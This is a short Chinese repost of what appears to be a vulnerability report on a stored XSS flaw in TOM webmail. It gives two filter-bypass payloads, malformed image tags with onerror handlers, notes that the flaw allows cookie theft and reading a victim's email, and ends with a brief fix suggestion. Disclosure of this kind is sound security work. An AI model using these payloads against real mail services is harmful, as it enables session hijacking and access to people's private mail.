好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

tom邮箱存储型xss xssfilter bypass技巧 - 网站安全

邮箱 漏洞 支持任何 浏览器 随便都可以获取cookie什么的 然后利用特殊浏览器查看此人的邮件 或者做做其他事情

跨站代码

 

<i><image src="x</i>"onerror='alert(1)'>

 

可爱的xss小弹框

 

 

 

修复方案: 邮件的过滤还是不严格 之前也看到过一个

 

 

<img src=x "此处打个回车"

onerror='alert(/xss/)'

>

后来改掉了 但是 依然过滤的不好

 

希望在邮箱过滤方面严格控制 

 

查看更多关于tom邮箱存储型xss xssfilter bypass技巧 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14303
  阅读:45次

上一篇: 乐视盒子无视预约提前购买&任意修改价钱 -

下一篇:HTML5安全攻防详析之完结篇:HTML5对安全的改进